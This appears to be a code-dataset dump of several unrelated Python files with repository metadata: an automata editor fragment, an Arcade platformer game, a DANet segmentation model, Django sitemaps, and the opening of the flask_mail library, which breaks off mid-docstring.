global nextNode
if(currNode == None):
currNode = node
currNode.showSelected()
for con in currNode.connections:
mainWidget.comboBox_con.addItem(con.name)
# print( 'First Node: ', currNode)
else:
nextNode = node
connectNodes(node)
deselectGlobalNodes()
print( 'Second Label', nextNode)
def deselectGlobalNodes():
global currNode
global nextNode
try:
currNode.hideSelected()
nextNode.hideSelected()
except:
pass
currNode = None
nextNode = None
mainWidget.comboBox_con.clear()
mainWidget.canvas.repaint()
mainWidget.canvas.update()
def connectNodes(nextNode):
if(currNode != None and mainWidget.comboBox_edit_type.currentText() != "CONNECTION"):
if(currNode == nextNode):
isSame = True
else:
isSame = False
if mainWidget.checkConExist(currNode, mainWidget.lineEdit_value.text()) and mainWidget.comboBox_type.currentText() == "DFA":
showMsg("Already Exist")
else:
newCon = Connection(currNode, nextNode, isSame)
currNode.connections.append(newCon)
conList.append(newCon)
mainWidget.update()
print( "Conecting")
else:
print( "Seleccione un nodo")
def showMsg(text):
msgBox = QtGui.QMessageBox( mainWidget )
msgBox.setIcon( QtGui.QMessageBox.Information )
msgBox.setText( text )
# msgBox.setInformativeText( "Do you really want?" )
# msgBox.addButton( QtGui.QMessageBox.No )
msgBox.addButton( QtGui.QMessageBox.Yes )
msgBox.setDefaultButton( QtGui.QMessageBox.Yes )
ret = msgBox.exec_()
# if ret == QtGui.QMessageBox.Yes:
# print( "Yes" )
# return
# else:
# print( "No" )
# return
def is_final( name ):
global Result
for node in nodeList:
if( node.label.text() == name ):
if( node.final):
Result = "Succesful, Last: "+name
return True
Result = "Failed, Last: "+name
return False
def getStates():
states = set()
for node in nodeList:
states.add(str(node.label.text()))
# print("States ", str(states))
return states
def getFinalStates():
states = set()
for node in nodeList:
if(node.final):
states.add(str(node.label.text()))
print("final States ", str(states))
return states
def findNode(name):
for n in nodeList:
if str(n.label.text()) == name:
return n
return None
def get_events():
events = []
for con in conList:
events.append( [ str(con.name) , str(con.node.label.text()) , str(con.nextNode.label.text()) ] )
print( str(con.node.label.text()), " --", str(con.name), "--> ", str(con.nextNode.label.text()))
return events
def get_transitions():
keys = {}
for node in nodeList:
transitions = {}
for con in node.connections:
transitions[con.name] = str(con.nextNode.label.text())
for k in symbols:
try:
# print(k, ' - ', transitions[k] )
pass
except:
transitions[k] = str(node.label.text())
keys[str(node.label.text())] = transitions
return keys
def createDFA():
newDFA = DFA("newDFA", alphabet)
print("nodes addState")
for node in nodeList:
newDFA.addState( str(node.label.text()), node.first, node.final )
for con in conList:
newDFA.addTransition( str(con.name), str(con.node.label.text()), str(con.nextNode.label.text()) )
return newDFA
def createNFA():
newNFA = NFA("newNFA", alphabet)
print("nodes addState")
for node in nodeList:
newNFA.addState( str(node.label.text()), node.first, node.final )
for con in conList:
newNFA.addTransition( str(con.name), str(con.node.label.text()), str(con.nextNode.label.text()) )
return newNFA
def createNFAe():
newNFAe = NFAe("newNFAe", alphabet)
print("nodes addState")
for node in nodeList:
newNFAe.addState( str(node.label.text()), node.first, node.final )
for con in conList:
newNFAe.addTransition( str(con.name), str(con.node.label.text()), str(con.nextNode.label.text()) )
return newNFAe
def evaluateREGEX():
regex = str( mainWidget.lineEdit_regex.text() )
pattern = re.compile( regex )
print("REGEX ", pattern.match( evalValue ) )
if bool(re.match( regex , evalValue )):
msg = evalValue+" succesfully pass "+regex
else:
msg = evalValue+" failed "+regex
showMsg(msg)
def evaluate():
print("Events "+mainWidget.comboBox_type.currentText() )
get_events()
evalValue = str(mainWidget.lineEdit_eval.text())
automata = None
if mainWidget.comboBox_type.currentText() == "DFA":
automata = createDFA()
elif mainWidget.comboBox_type.currentText() == "NFA":
automata = createNFA()
elif mainWidget.comboBox_type.currentText() == "NFA EPSILON":
automata = createNFAe()
elif mainWidget.comboBox_type.currentText() == "REGEX":
evaluateREGEX()
return
msg = "Evaluating " + evalValue + " last state " + automata.match( evalValue ).label
showMsg(msg)
def convert():
print("CONVERT "+mainWidget.comboBox_type.currentText() )
get_events()
evalValue = str(mainWidget.lineEdit_eval.text())
if mainWidget.comboBox_type.currentText() == "DFA":
DFAtoREGEX()
elif mainWidget.comboBox_type.currentText() == "NFA":
NFAtoDFA()
elif mainWidget.comboBox_type.currentText() == "NFA EPSILON":
NFAetoDFA()
elif mainWidget.comboBox_type.currentText() == "REGEX":
REGEXtoNFAe()
def NFAtoDFA():
print("convert NFA to DFA")
automata = createNFA()
newDFA = automata.toDFA()
regenerateAutomata(newDFA)
mainWidget.comboBox_type.setCurrentIndex(0)
def NFAetoDFA():
print("convert NFAe to DFA")
automata = createNFAe()
newDFA = automata.toDFA()
regenerateAutomata(newDFA)
mainWidget.comboBox_type.setCurrentIndex(0)
def DFAtoREGEX():
print("DFA to REGEX")
automata = createDFA()
toRE = automata.toRE()
# print("toRE ", toRE['regex'], " - ", toRE["stepByStep"] )
showMsg("DFA to RE: "+ toRE['regex'])
mainWidget.lineEdit_regex.setText(toRE['regex'])
mainWidget.comboBox_type.setCurrentIndex(3)
def REGEXtoNFAe():
print("REGEX to NFAe")
nfaLib = AutomataLib.RegExp( str(mainWidget.lineEdit_regex.text() ) )
print( "NFA ", nfaLib )
newNFA = NFAe("newNFA", alphabet)
for s in nfaLib.states() :
print("state ", s)
newNFA.addState( "Q"+str(s), s in nfaLib.initial, nfaLib.isfinal(s) )
# for con in conList:
# newNFA.addTransition( str(con.name), str(con.node.label.text()), str(con.nextNode.label.text()) )
for s in nfaLib.states() :
for c in nfaLib.alphabet:
for neighbor in nfaLib.transition(s,c):
if str(c) == '|':
c = 'E'
print( s ," --[" + str(c) + "]-->", neighbor )
newNFA.addTransition(str(c) , "Q"+str(s), "Q"+str(neighbor) )
regenerateAutomata(newNFA)
mainWidget.comboBox_type.setCurrentIndex(2)
def regenerateAutomata(automata):
print( "Regenerate")
global startNode
global evalValue
global nodeList
global conList
global symbols
emptyLists()
for s in automata.states:
img = "normal.png"
if s.isInitial:
img = "start.png"
elif s.isFinal:
img = "final.png"
randomX = randint(30, 800)
randomY = randint(30, 600)
new_node = Node(canvas, s.isInitial , s.isFinal , img, s.label )
new_node.moveNode(QtCore.QPoint( randomX , randomY ))
if s.isInitial:
startNode = new_node
for s in automata.states:
for t in s.transitions:
conNode = findNode( t._from )
conNextNode = findNode( t._to )
newCon = Connection(conNode , conNextNode , t._from == t._to )
newCon.name = t.label
conNode.connections.append(newCon)
conList.append(newCon)
def emptyLists():
for con in conList:
try:
con.node.delNode()
except:
print("err del node from con")
try:
con.nextNode.delNode()
except:
print("err del nextNode from con")
for node in nodeList:
try:
node.delNode()
except:
print("err del node from nodeList")
if __name__ == '__main__':
ui = Ui_MainWindow()
ui.setupUi()
ui.show()
ui.load(True)
sys.exit(app.exec_()) | [
"noreply@github.com"
] | rubencg195.noreply@github.com |
639eb6874b95a9e96a37069b983815ce6ac2bc13 | 227c102ed508ad2b1d046340dcb598a7b16e2925 | /.history/Forritun/Verkefni með einkunn/Lokaverkefni/lokaverkefni_20201208144514.py | abaca0b10d37452fa155d2847cc3949d691d5db1 | [] | no_license | larusarmann/Skoli-haust-2020 | 298e48f1c20d7ec0c92124018650253f13bcbb2f | 3061a0238b74919daccaa74117bc1c32b3436619 | refs/heads/master | 2023-02-07T09:15:45.493928 | 2020-12-09T19:46:53 | 2020-12-09T19:46:53 | 292,543,006 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 9,104 | py | """
Show how to do enemies in a platformer
Artwork from: http://kenney.nl
Tiled available from: http://www.mapeditor.org/
If Python and Arcade are installed, this example can be run from the command line with:
python -m arcade.examples.sprite_enemies_in_platformer
"""
import random
import arcade
import os
SPRITE_SCALING_coin=12
SPRITE_SCALING = 0.5
SPRITE_NATIVE_SIZE = 128
SPRITE_SIZE = int(SPRITE_NATIVE_SIZE * SPRITE_SCALING)
SCREEN_WIDTH = 800
SCREEN_HEIGHT = 600
SCREEN_TITLE = "Lárus"
VIEWPORT_MARGIN = 40
RIGHT_MARGIN = 150
MOVEMENT_SPEED = 5
JUMP_SPEED = 14
GRAVITY = 0.5
class MyGame(arcade.Window):
""" Main application class. """
def __init__(self):
"""
Initializer
"""
super().__init__(SCREEN_WIDTH, SCREEN_HEIGHT, "Lokaverkefni Lárus")
# Sprite lists
self.coin_list = None
self.player_list = None
self.wall_list = None
self.flag=True
self.score = 0
# Set up the player
self.player_sprite = None
# This variable holds our simple "physics engine"
self.physics_engine = None
# Manage the view port
self.view_left = 0
self.view_bottom = 0
def setup(self):
""" Set up the game and initialize the variables. """
self.wall_list = arcade.SpriteList()
self.enemy_list = arcade.SpriteList()
self.player_list = arcade.SpriteList()
self.coin_list = arcade.SpriteList()
for x in range(0, SCREEN_WIDTH, SPRITE_SIZE):
wall = arcade.Sprite("C:/Git/Skoli-haust-2020/Forritun/Verkefni með einkunn/Lokaverkefni/images/rpgTile019.png", SPRITE_SCALING)
wall.bottom = 0
wall.left = x
self.wall_list.append(wall)
# Draw the platform
for x in range(SPRITE_SIZE * 3, SPRITE_SIZE * 8, SPRITE_SIZE):
wall = arcade.Sprite("C:/Git/Skoli-haust-2020/Forritun/Verkefni með einkunn/Lokaverkefni/images/rpgTile019.png", SPRITE_SCALING)
wall.bottom = SPRITE_SIZE * 3
wall.left = x
self.wall_list.append(wall)
# Draw the crates
for x in range(0, SCREEN_WIDTH, SPRITE_SIZE * 5):
wall = arcade.Sprite("C:/Git/Skoli-haust-2020/Forritun/Verkefni með einkunn/Lokaverkefni/images/boxCrate_double.png", SPRITE_SCALING)
wall.bottom = SPRITE_SIZE
wall.left = x
self.wall_list.append(wall)
for i in range(7):
# Create the coin instance
coin = arcade.Sprite("C:\Git\Skoli-haust-2020\Forritun\Verkefni með einkunn\Lokaverkefni\images\coinGold.png", SPRITE_SCALING / 2)
# Position the coin
coin.center_x = random.randrange(SCREEN_WIDTH)
coin.center_y = random.randrange(600)
# Add the coin to the lists
self.coin_list.append(coin)
# -- Draw an enemy on the ground
enemy = arcade.Sprite("C:/Git/Skoli-haust-2020/Forritun/Verkefni með einkunn/Lokaverkefni/images/character_zombie_idle.png", SPRITE_SCALING)
enemy.bottom = SPRITE_SIZE
enemy.left = SPRITE_SIZE * 2
# Set enemy initial speed
enemy.change_x = 2
self.enemy_list.append(enemy)
# -- Draw a enemy on the platform
enemy = arcade.Sprite("C:/Git/Skoli-haust-2020/Forritun/Verkefni með einkunn/Lokaverkefni/images/character_zombie_idle.png", SPRITE_SCALING)
enemy.bottom = SPRITE_SIZE * 4
enemy.left = SPRITE_SIZE * 4
# Set boundaries on the left/right the enemy can't cross
enemy.boundary_right = SPRITE_SIZE * 8
enemy.boundary_left = SPRITE_SIZE * 3
enemy.change_x = 2
self.enemy_list.append(enemy)
# -- Set up the player
self.player_sprite = arcade.Sprite("C:/Git/Skoli-haust-2020/Forritun/Verkefni með einkunn/Lokaverkefni/images/character1.png", SPRITE_SCALING)
self.player_list.append(self.player_sprite)
# Starting position of the player
self.player_sprite.center_x = 64
self.player_sprite.center_y = 270
self.physics_engine = arcade.PhysicsEnginePlatformer(self.player_sprite,
self.wall_list,
gravity_constant=GRAVITY)
# Set the background color
arcade.set_background_color(arcade.color.AMAZON)
def on_draw(self):
arcade.start_render()
if self.flag:
arcade.set_background_color(arcade.color.BLUE)
arcade.draw_text("Lárus Ármann Kjartansson\n Náðu fimm peningum til að vinna leikin \n Ýttu á Q til að hefja leik", 10,300, arcade.color.WHITE, 24)
arcade.draw_text("Lárus Ármann ",self.view_left+10,self.view_bottom+10, arcade.color.CHERRY, 14)
elif self.score >=5 and self.flag==False:
arcade.set_background_color(arcade.color.BUBBLES)
arcade.draw_text("Leik lokið ",self.view_left+200,self.view_bottom+300, arcade.color.CHERRY, 44)
arcade.draw_text("Lárus Ármann ",self.view_left+10,self.view_bottom+10, arcade.color.CHERRY, 14)
else:
arcade.set_background_color(arcade.color.AMAZON)
self.wall_list.draw()
self.player_list.draw()
arcade.draw_text(f"stig: {self.score}", self.player_sprite.center_x-15,self.player_sprite.center_y+30, arcade.color.WHITE, 14)
arcade.draw_text("Lárus Ármann ",self.view_left+10,self.view_bottom+10, arcade.color.CHERRY, 14)
self.coin_list.draw()
def draw_game(self):
"""
Draw all the sprites, along with the score.
"""
# Draw all the sprites.
self.player_list.draw()
self.coin_list.draw()
# Put the text on the screen.
output = f"Score: {self.score}"
arcade.draw_text(output, 10, 20, arcade.color.WHITE, 14)
def on_key_press(self, key, modifiers):
"""
Called whenever the mouse moves.
"""
if key == arcade.key.Q:
self.flag=False
else:
if key == arcade.key.UP:
if self.physics_engine.can_jump():
self.player_sprite.change_y = JUMP_SPEED
elif key == arcade.key.LEFT:
self.player_sprite.change_x = -MOVEMENT_SPEED
elif key == arcade.key.RIGHT:
self.player_sprite.change_x = MOVEMENT_SPEED
def on_key_release(self, key, modifiers):
"""
Called when the user presses a mouse button.
"""
if key == arcade.key.LEFT or key == arcade.key.RIGHT:
self.player_sprite.change_x = 0
def on_update(self, delta_time):
self.physics_engine.update()
self.coin_list.update()
hit_list = arcade.check_for_collision_with_list(self.player_sprite, self.coin_list)
if len(hit_list)>0:
for pening in hit_list:
pening.remove_from_sprite_lists()
self.score=self.score+1
# --- Manage Scrolling ---
# Keep track of if we changed the boundary. We don't want to call the
# set_viewport command if we didn't change the view port.
changed = False
# Scroll left
left_boundary = self.view_left + VIEWPORT_MARGIN
if self.player_sprite.left < left_boundary:
self.view_left -= left_boundary - self.player_sprite.left
changed = True
# Scroll right
right_boundary = self.view_left + SCREEN_WIDTH - VIEWPORT_MARGIN
if self.player_sprite.right > right_boundary:
self.view_left += self.player_sprite.right - right_boundary
changed = True
# Scroll up
top_boundary = self.view_bottom + SCREEN_HEIGHT - VIEWPORT_MARGIN
if self.player_sprite.top > top_boundary:
self.view_bottom += self.player_sprite.top - top_boundary
changed = True
# Scroll down
bottom_boundary = self.view_bottom + VIEWPORT_MARGIN
if self.player_sprite.bottom < bottom_boundary:
self.view_bottom -= bottom_boundary - self.player_sprite.bottom
changed = True
# Make sure our boundaries are integer values. While the view port does
# support floating point numbers, for this application we want every pixel
# in the view port to map directly onto a pixel on the screen. We don't want
# any rounding errors.
self.view_left = int(self.view_left)
self.view_bottom = int(self.view_bottom)
# If we changed the boundary values, update the view port to match
if changed:
arcade.set_viewport(self.view_left,
SCREEN_WIDTH + self.view_left - 1,
self.view_bottom,
SCREEN_HEIGHT + self.view_bottom - 1)
def main():
window = MyGame()
window.setup()
arcade.run()
if __name__ == "__main__":
main() | [
"larus.armann@gmail.com"
] | larus.armann@gmail.com |
05770b3305811e367771593ca4927690af14e802 | 5f8cfff64811b37ba3cbdee17100c23cc2bb3a53 | /encoding/models/danetPSP_nonsharedbn.py | d4f4f3ddf010412c4fe37988292d118bfc2936cc | [] | no_license | ZhenningZhou/AffKpNet | 656d1f31e66bdb39ddfbca60281b574efc556a99 | 412813d2ca0d8cc2b0b75f78ee957e1b7a919b83 | refs/heads/master | 2023-05-29T08:15:37.097045 | 2021-06-15T04:15:02 | 2021-06-15T04:15:02 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,607 | py | ###########################################################################
# Created by: CASIA IVA
# Email: jliu@nlpr.ia.ac.cn
# Copyright (c) 2018
###########################################################################
from __future__ import division
import os
import numpy as np
import torch
import torch.nn as nn
from torch.nn.functional import upsample,normalize
from ..nn import PAM_Module
from ..nn import CAM_Module
from ..models import BaseNet
__all__ = ['DANetPSP', 'get_danetpsp']
class DANetPSP(BaseNet):
r"""Fully Convolutional Networks for Semantic Segmentation
Parameters
----------
nclass : int
Number of categories for the training dataset.
backbone : string
Pre-trained dilated backbone network type (default:'resnet50'; 'resnet50',
'resnet101' or 'resnet152').
norm_layer : object
Normalization layer used in backbone network (default: :class:`mxnet.gluon.nn.BatchNorm`;
Reference:
Long, Jonathan, Evan Shelhamer, and Trevor Darrell. "Fully convolutional networks
for semantic segmentation." *CVPR*, 2015
"""
def __init__(self, nclass, backbone, aux=False, se_loss=False, norm_layer=nn.BatchNorm2d, **kwargs):
super(DANetPSP, self).__init__(nclass, backbone, aux, se_loss, norm_layer=norm_layer, **kwargs)
self.head = DANetHead(2048, nclass, norm_layer)
def forward(self, x):
imsize = x.size()[2:]
_, _, c3, c4 = self.base_forward(x)
x = self.head(c4)
x = list(x)
x[0] = upsample(x[0], imsize, **self._up_kwargs)
x[1] = upsample(x[1], imsize, **self._up_kwargs)
x[2] = upsample(x[2], imsize, **self._up_kwargs)
outputs = [x[0]]
outputs.append(x[1])
outputs.append(x[2])
return tuple(outputs)
class DANetHead(nn.Module):
def __init__(self, in_channels, out_channels, norm_layer):
super(DANetHead, self).__init__()
inter_channels = in_channels // 4
self.conv5a = nn.Sequential(nn.Conv2d(in_channels, inter_channels, 3, padding=1, bias=False),
norm_layer(inter_channels),
nn.ReLU())
self.conv5c = nn.Sequential(nn.Conv2d(in_channels, inter_channels, 3, padding=1, bias=False),
norm_layer(inter_channels),
nn.ReLU())
self.sa1x1 = PAM_Module(inter_channels)
self.sa2x2 = PAM_Module(inter_channels)
self.sa3x3 = PAM_Module(inter_channels)
self.sa6x6 = PAM_Module(inter_channels)
self.sa = PAM_Module(inter_channels)
self.sc = CAM_Module(inter_channels)
self.conv51 = nn.Sequential(nn.Conv2d(inter_channels, inter_channels, 3, padding=1, bias=False),
norm_layer(inter_channels),
nn.ReLU())
self.conv52 = nn.Sequential(nn.Conv2d(inter_channels, inter_channels, 3, padding=1, bias=False),
norm_layer(inter_channels),
nn.ReLU())
self.conv6 = nn.Sequential(nn.Dropout2d(0.1, False), nn.Conv2d(512, out_channels, 1))
self.conv7 = nn.Sequential(nn.Dropout2d(0.1, False), nn.Conv2d(512, out_channels, 1))
self.conv8 = nn.Sequential(nn.Dropout2d(0.1, False), nn.Conv2d(512, out_channels, 1))
self.avepool1x1 = nn.AvgPool2d(9, 9)
self.conv1x1 = nn.Sequential(nn.Conv2d(512, 128, 1), norm_layer(inter_channels//4),nn.Dropout2d(0.1, False), )
self.avepool2x2 = nn.AvgPool2d(5, 5)
self.conv2x2 = nn.Sequential(nn.Conv2d(512, 128, 1), norm_layer(inter_channels//4),nn.Dropout2d(0.1, False), )
self.avepool3x3 = nn.AvgPool2d(3, 3)
self.conv3x3 = nn.Sequential(nn.Conv2d(512, 128, 1), norm_layer(inter_channels//4),nn.Dropout2d(0.1, False), )
self.avepool6x6 = nn.AvgPool2d(2, 2)
self.conv6x6 = nn.Sequential(nn.Conv2d(512, 128, 1), norm_layer(inter_channels//4),nn.Dropout2d(0.1, False), )
self.interp = nn.Upsample(size=(60, 60), mode='bilinear')
self.conv512 = nn.Sequential(nn.Conv2d(1024, 512, 1), norm_layer(inter_channels),nn.Dropout2d(0.1, False), )
def forward(self, x):
feat1 = self.conv5a(x)
# PSP below
featpsp1x1 = self.avepool1x1(feat1)
featpsp1x1 = self.sa1x1(featpsp1x1)
featpsp1x1 = self.interp(featpsp1x1)
sa_feat1x1 = self.conv1x1(featpsp1x1)
featpsp2x2 = self.avepool2x2(feat1)
featpsp2x2 = self.sa2x2(featpsp2x2)
featpsp2x2 = self.interp(featpsp2x2)
sa_feat2x2 = self.conv2x2(featpsp2x2)
featpsp3x3 = self.avepool3x3(feat1)
featpsp3x3 = self.sa3x3(featpsp3x3)
featpsp3x3 = self.interp(featpsp3x3)
sa_feat3x3 = self.conv3x3(featpsp3x3)
featpsp6x6 = self.avepool6x6(feat1)
featpsp6x6 = self.sa6x6(featpsp6x6)
featpsp6x6 = self.interp(featpsp6x6)
sa_feat6x6 = self.conv6x6(featpsp6x6)
sa_feat = self.sa(feat1)
# concatenate all 4 channels
sa_feat = torch.cat((sa_feat,sa_feat1x1,sa_feat2x2,sa_feat3x3,sa_feat6x6), 1)
sa_feat = self.conv512(sa_feat)
sa_conv = self.conv51(sa_feat)
sa_output = self.conv6(sa_conv)
feat2 = self.conv5c(x)
sc_feat = self.sc(feat2)
sc_conv = self.conv52(sc_feat)
sc_output = self.conv7(sc_conv)
feat_sum = sa_conv+sc_conv
sasc_output = self.conv8(feat_sum)
output = [sasc_output]
output.append(sa_output)
output.append(sc_output)
return tuple(output)
def get_danetpsp(dataset='pascal_voc', backbone='resnet50', pretrained=False,
root='./pretrain_models', **kwargs):
r"""DANet model from the paper `"Dual Attention Network for Scene Segmentation"
<https://arxiv.org/abs/1809.02983.pdf>`
"""
acronyms = {
'pascal_voc': 'voc',
'pascal_aug': 'voc',
'pcontext': 'pcontext',
'ade20k': 'ade',
'cityscapes': 'cityscapes',
}
# infer number of classes
from ..datasets import datasets, VOCSegmentation, VOCAugSegmentation, ADE20KSegmentation
model = DANetPSP(datasets[dataset.lower()].NUM_CLASS, backbone=backbone, root=root, **kwargs)
if pretrained:
from .model_store import get_model_file
model.load_state_dict(torch.load(
get_model_file('fcn_%s_%s'%(backbone, acronyms[dataset]), root=root)),
strict=False)
return model
| [
"fujenchu@gatech.edu"
] | fujenchu@gatech.edu |
343be7b674ad7ed5232dd69911abf6fbc5fe98a4 | 78ddf555db358f9683db00bf49b3d1a45cd998a9 | /forum/sitemaps.py | a4b63e0a11b35c9a8578c0a28eaf27bfbf104a43 | [] | no_license | azeez010/AfriconnForum | 9e0aa7a6abb40f20ac0739b9cadc75da89e91110 | 1b597850208c3caef474b9412bdf02dfefd1a30b | refs/heads/master | 2022-12-19T12:49:09.389062 | 2020-09-19T14:40:48 | 2020-09-19T14:40:48 | 298,311,404 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,269 | py | from django.contrib.sitemaps import Sitemap
from root.models import Profile
from polls.models import Poll
from job.models import Job
from blog.models import Blog
from .models import Thread, Category
from django.shortcuts import reverse
class StaticViewSiteMap(Sitemap):
changeFreq = 'always'
def items(self):
return ['search-blog', 'forum-home', 'blog-home', 'all-category', 'search-forum', 'register', 'login', 'home', 'countrystats', 'info', 'new', 'search', 'results', "job-home", 'search-job', 'joblist']
def location(self, item):
return reverse(item)
class ProfileSiteMap(Sitemap):
changeFreq = 'always'
def items(self):
return Profile.objects.all()
class PollSiteMap(Sitemap):
changeFreq = 'always'
def items(self):
return Poll.objects.all()
class CategorySiteMap(Sitemap):
changeFreq = 'always'
def items(self):
return Category.objects.all()
class ThreadSiteMap(Sitemap):
changeFreq = 'always'
def items(self):
return Thread.objects.all()
class JobSiteMap(Sitemap):
changeFreq = 'always'
def items(self):
return Job.objects.all()
class BlogSiteMap(Sitemap):
changeFreq = 'always'
def items(self):
return Blog.objects.all()
| [
"dataslid@gmail.com"
] | dataslid@gmail.com |
4e05342bbe67e0b1ef38fe46f34073cc3d59822c | 0567b686db4d05b44a70fdfd7a61ed07f3be1fb4 | /flask_mail.py | 50630a3d0f3206394769458abef4da70620487e8 | [
"MIT"
] | permissive | achiang/flask-unchained | 624271d903a8d2af2c15d83c79571e8b5f91a56e | 12788a6e618904a25ff2b571eb05ff1dc8f1840f | refs/heads/master | 2020-04-19T20:21:10.731764 | 2018-12-29T07:06:14 | 2018-12-29T07:06:14 | 168,411,738 | 0 | 0 | MIT | 2019-01-30T20:39:42 | 2019-01-30T20:39:41 | null | UTF-8 | Python | false | false | 22,070 | py | # -*- coding: utf-8 -*-
"""
flaskext.mail
~~~~~~~~~~~~~
Flask extension for sending email.
Copyright (c) 2010 by danjac.
Some rights reserved.
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions are
met:
* Redistributions of source code must retain the above copyright
notice, this list of conditions and the following disclaimer.
* Redistributions in binary form must reproduce the above
copyright notice, this list of conditions and the following
disclaimer in the documentation and/or other materials provided
with the distribution.
* The names of the contributors may not be used to endorse or
promote products derived from this software without specific
prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
"AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
(INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""
from __future__ import with_statement
import re
import smtplib
import sys
import time
import unicodedata
from contextlib import contextmanager
from email import charset
from email.encoders import encode_base64
from email.header import Header
from email.mime.base import MIMEBase
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText
from email.utils import formataddr, formatdate, make_msgid, parseaddr
import blinker
from flask import current_app
try:
from email import policy
message_policy = policy.SMTP
except ImportError:
message_policy = None
__version__ = '0.9.3'
PY3 = sys.version_info[0] == 3
PY34 = PY3 and sys.version_info[1] >= 4
if PY3:
string_types = str,
text_type = str
else:
string_types = basestring, # noqa: F821
text_type = unicode # noqa: F821
charset.add_charset('utf-8', charset.SHORTEST, None, 'utf-8')
class FlaskMailUnicodeDecodeError(UnicodeDecodeError):
def __init__(self, obj, *args):
self.obj = obj
UnicodeDecodeError.__init__(self, *args)
def __str__(self):
original = UnicodeDecodeError.__str__(self)
return '%s. You passed in %r (%s)' % (
original, self.obj, type(self.obj)
)
def force_text(s, encoding='utf-8', errors='strict'):
"""
Similar to smart_text, except that lazy instances are resolved to
strings, rather than kept as lazy objects.
If strings_only is True, don't convert (some) non-string-like objects.
"""
if isinstance(s, text_type):
return s
try:
if not isinstance(s, string_types):
if PY3:
if isinstance(s, bytes):
s = text_type(s, encoding, errors)
else:
s = text_type(s)
elif hasattr(s, '__unicode__'):
s = s.__unicode__()
else:
s = text_type(bytes(s), encoding, errors)
else:
s = s.decode(encoding, errors)
except UnicodeDecodeError as e:
if not isinstance(s, Exception):
raise FlaskMailUnicodeDecodeError(s, *e.args)
else:
s = ' '.join([force_text(arg, encoding, errors)
for arg in s])
return s
def sanitize_subject(subject, encoding='utf-8'):
try:
subject.encode('ascii')
except UnicodeEncodeError:
try:
subject = Header(subject, encoding).encode()
except UnicodeEncodeError:
subject = Header(subject, 'utf-8').encode()
return subject
def sanitize_address(addr, encoding='utf-8'):
if isinstance(addr, string_types):
addr = parseaddr(force_text(addr))
nm, addr = addr
try:
nm = Header(nm, encoding).encode()
except UnicodeEncodeError:
nm = Header(nm, 'utf-8').encode()
try:
addr.encode('ascii')
except UnicodeEncodeError: # IDN
if '@' in addr:
localpart, domain = addr.split('@', 1)
try:
localpart = Header(localpart, encoding).encode()
except UnicodeEncodeError:
localpart = Header(localpart, 'utf-8').encode()
domain = domain.encode('idna').decode('ascii')
addr = '@'.join([localpart, domain])
else:
addr = Header(addr, encoding).encode()
return formataddr((nm, addr))
def sanitize_addresses(addresses, encoding='utf-8'):
return map(lambda e: sanitize_address(e, encoding), addresses)
def fix_recipients_list(recipients):
fixed_recipients = []
for recipient in recipients:
if not isinstance(recipient, string_types):
# Ensure that the name/email values are a tuple and not a list
fixed_recipients.append(tuple(recipient))
else:
fixed_recipients.append(recipient)
return fixed_recipients
def _has_newline(line):
"""Used by has_bad_header to check for \\r or \\n"""
if line and ('\r' in line or '\n' in line):
return True
return False
class Connection(object):
"""Handles connection to host."""
def __init__(self, mail):
self.mail = mail
def __enter__(self):
if self.mail.suppress:
self.host = None
else:
self.host = self.configure_host()
self.num_emails = 0
return self
def __exit__(self, exc_type, exc_value, tb):
if self.host and getattr(self.host, 'sock', None):
try:
self.host.quit()
except smtplib.SMTPServerDisconnected:
pass
def configure_host(self):
if self.mail.use_ssl:
host = smtplib.SMTP_SSL(self.mail.server, self.mail.port)
else:
host = smtplib.SMTP(self.mail.server, self.mail.port)
host.set_debuglevel(int(self.mail.debug))
if self.mail.use_tls:
(resp, reply) = host.starttls()
# Fix CVE-2016-0772 on old Python installations
if resp != 200:
raise smtplib.SMTPResponseException(resp, reply)
if self.mail.username and self.mail.password:
host.login(self.mail.username, self.mail.password)
return host
def send(self, message, envelope_from=None):
"""Verifies and sends message.
:param message: Message instance.
:param envelope_from: Email address to be used in MAIL FROM command.
"""
assert message.send_to, "No recipients have been added"
assert message.sender, (
"The message does not specify a sender and a default sender "
"has not been configured")
if message.has_bad_headers():
raise BadHeaderError
if message.date is None:
message.date = time.time()
ret = None
if self.host:
ret = self.host.sendmail(
sanitize_address(envelope_from or message.sender),
list(sanitize_addresses(message.send_to)),
message.as_bytes() if PY3 else message.as_string(),
message.mail_options,
message.rcpt_options
)
email_dispatched.send(message, app=current_app._get_current_object())
self.num_emails += 1
if self.num_emails == self.mail.max_emails:
self.num_emails = 0
if self.host:
self.host.quit()
self.host = self.configure_host()
return ret
def send_message(self, *args, **kwargs):
"""Shortcut for send(msg).
Takes same arguments as Message constructor.
:versionadded: 0.3.5
"""
return self.send(Message(*args, **kwargs))
class BadHeaderError(Exception):
pass
class Attachment(object):
"""Encapsulates file attachment information.
:versionadded: 0.3.5
:param filename: filename of attachment
:param content_type: file mimetype
:param data: the raw file data
:param disposition: content-disposition (if any)
:param content_id: content-id for inline reference
"""
def __init__(self, filename=None, content_type=None, data=None,
disposition=None, headers=None, content_id=None):
self.filename = filename
self.content_type = content_type
self.data = data
self.disposition = disposition or 'attachment'
self.headers = headers or {}
self.content_id = content_id
class Message(object):
"""Encapsulates an email message.
:param subject: email subject header
:param recipients: list of email addresses
:param body: plain text message
:param html: HTML message
